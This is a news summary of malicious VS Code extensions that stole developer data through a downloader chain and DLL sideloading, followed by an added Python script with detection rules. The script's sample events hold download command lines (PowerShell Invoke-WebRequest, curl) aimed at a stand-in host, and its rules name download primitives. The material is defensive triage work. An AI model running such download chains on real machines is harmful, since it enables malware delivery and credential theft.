Particle.news

Microsoft Removes Malicious VS Code Extensions That Deployed Infostealer

Researchers describe extensions that posed stealthy information‑stealing threats to developer machines.

Overview

  • Koi Security identified the Bitcoin Black and Codo AI extensions on the VS Code Marketplace under the 'BigBlack' publisher as malicious.
  • Microsoft’s removal records show BigBlack.bitcoin-black was taken down on December 5 and BigBlack.codo-ai on December 8, with a third BigBlack package also removed for malware.
  • The extensions first used a visible PowerShell downloader, then switched to a hidden batch-and-curl chain that fetched a legitimate Lightshot executable; that executable sideloaded a rogue DLL placed beside it, a classic DLL hijacking pattern.
  • Stolen data included screenshots, Wi‑Fi credentials, clipboard contents, installed apps, running processes, cryptocurrency wallets, and browser cookies, the last harvested by launching Chrome and Edge in headless mode; the loot was staged in a folder named Evelyn.
  • 29 of 72 VirusTotal engines detected the malicious DLL, install counts were in the tens, and separate Socket research flagged additional malicious packages across the Go, npm, and Rust ecosystems.
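The four stages above (PowerShell downloader from VS Code, batch-and-curl chain, a Lightshot binary living in an extension folder, headless browsers spawned by that process) each leave a process-tree footprint. The script below is an added triage example, not code from Koi Security, Socket, or Microsoft: it runs the corresponding rules over constructed process-creation events. The event field names, the `Lightshot.exe` file name, the `.vscode\extensions` drop location, and the exact command lines are assumptions modelled on the description, not indicators from the report.

```python
"""Triage rules for the VS Code extension -> infostealer chain summarised above.
Added example: runs over constructed process-creation events, not real telemetry.
Field names (pid, image, cmdline, ancestors) are an assumption about the log schema."""
from pathlib import PureWindowsPath

# Constructed sample events. "ancestors" lists parent image names, nearest first.
SAMPLE_EVENTS = [
    {"pid": 4100, "image": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "cmdline": "Code.exe", "ancestors": ["explorer.exe"]},
    # Stage 1 as described: a visible PowerShell downloader launched from VS Code.
    {"pid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Invoke-WebRequest http://example.invalid/p -OutFile p.zip",
     "ancestors": ["Code.exe", "explorer.exe"]},
    # Stage 2 as described: hidden batch file that calls curl.
    {"pid": 4130, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c stage.bat", "ancestors": ["Code.exe", "explorer.exe"]},
    {"pid": 4131, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -s -o Lightshot.exe http://example.invalid/l",
     "ancestors": ["cmd.exe", "Code.exe", "explorer.exe"]},
    # Stage 3: legitimate Lightshot binary running from the extension folder (assumed path).
    {"pid": 4140, "image": r"C:\Users\dev\.vscode\extensions\bigblack.codo-ai-1.0.0\Lightshot.exe",
     "cmdline": "Lightshot.exe", "ancestors": ["cmd.exe", "Code.exe", "explorer.exe"]},
    # Stage 4: headless browser spawned by the hijacked process to dump cookies.
    {"pid": 4150, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe --headless", "ancestors": ["Lightshot.exe", "cmd.exe", "Code.exe"]},
    # Benign controls: a normal Chrome child process and a developer-run curl.
    {"pid": 4151, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe --type=renderer", "ancestors": ["chrome.exe", "explorer.exe"]},
    {"pid": 4160, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe https://example.invalid/api",
     "ancestors": ["pwsh.exe", "WindowsTerminal.exe", "explorer.exe"]},
]

BROWSERS = {"chrome.exe", "msedge.exe"}
# Real PowerShell download primitives; matched case-insensitively in the command line.
DOWNLOAD_MARKERS = ("invoke-webrequest", "downloadfile", "net.webclient")


def image_name(event):
    """Lower-cased file name of the process image."""
    return PureWindowsPath(event["image"]).name.lower()


def under_extensions_dir(image):
    """True if the path contains a '.vscode\\extensions' component pair."""
    parts = [p.lower() for p in PureWindowsPath(image).parts]
    return any(parts[i] == ".vscode" and parts[i + 1] == "extensions"
               for i in range(len(parts) - 1))


def triage(events):
    """Return (rule, pid) pairs for events matching one of the four stage rules."""
    findings = []
    for ev in events:
        name = image_name(ev)
        cmd = ev["cmdline"].lower()
        anc = [a.lower() for a in ev["ancestors"]]
        # PowerShell spawned directly by VS Code and pulling something from the network.
        if name == "powershell.exe" and anc[:1] == ["code.exe"] \
                and any(m in cmd for m in DOWNLOAD_MARKERS):
            findings.append(("powershell_downloader_from_vscode", ev["pid"]))
        # curl under cmd.exe under Code.exe: the batch-and-curl chain.
        if name == "curl.exe" and anc[:2] == ["cmd.exe", "code.exe"]:
            findings.append(("batch_curl_chain_from_vscode", ev["pid"]))
        # A Lightshot binary has no business living inside an extension folder.
        if "lightshot" in name and under_extensions_dir(ev["image"]):
            findings.append(("lightshot_in_extension_dir", ev["pid"]))
        # Headless Chrome/Edge whose parent is not the browser itself.
        if name in BROWSERS and "--headless" in cmd and (not anc or anc[0] not in BROWSERS):
            findings.append(("headless_browser_unusual_parent", ev["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in triage(SAMPLE_EVENTS):
        print(f"{rule:36s} pid={pid}")
```

The headless-browser rule will also fire on legitimate automation (Puppeteer, Playwright, CI runners), so in production it is a hunting query to be scoped to developer workstations or allowlisted by parent image, not an alert on its own; the curl-under-cmd-under-Code.exe rule is the cleaner signal, since VS Code tasks normally run through an integrated terminal rather than a bare cmd.exe child.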